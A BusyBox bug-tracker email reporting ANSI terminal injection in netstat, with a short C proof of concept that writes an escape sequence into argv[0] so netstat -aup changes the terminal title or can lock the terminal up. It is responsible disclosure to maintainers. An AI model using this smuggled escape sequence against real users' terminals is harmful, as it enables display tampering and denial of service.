[Bug 15922] New: ANSI terminal injection possible in netstat

bugzilla at busybox.net bugzilla at busybox.net
Sat Jan 20 21:09:18 UTC 2024


https://bugs.busybox.net/show_bug.cgi?id=15922

            Bug ID: 15922
           Summary: ANSI terminal injection possible in netstat
           Product: Busybox
           Version: unspecified
          Hardware: All
                OS: Linux
            Status: NEW
          Severity: normal
          Priority: P5
         Component: Networking
          Assignee: unassigned at busybox.net
          Reporter: rbranco at suse.com
                CC: busybox-cvs at busybox.net
  Target Milestone: ---

The following code displays a X as the title of an ANSI terminal. Without the
final '\007' the terminal can be locked up.

I think the project in general would benefit from an audit of every line using
/proc/*/cmdline, /proc/*/comm, /proc/*/environ and even the symlinks
/proc/*/exe & cwd.

$ cat > a.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <err.h>

int main(int argc, char *argv[]) {
        struct sockaddr_in sin;
        int s;

        if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
                err(1, "socket()");

        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = INADDR_ANY;

        if (bind(s, (struct sockaddr*)&sin, sizeof(sin)) < 0)
                err(1, "bind()");

        strcpy(argv[0], "/\033]0;X\007");

        while (1)
                sleep(3600);
}
EOF

$ unset PROMPT_COMMAND

$ cc a.c

$ ./a.out &

$ netstat -aup

-- 
You are receiving this mail because:
You are on the CC list for the bug.


More information about the busybox-cvs mailing list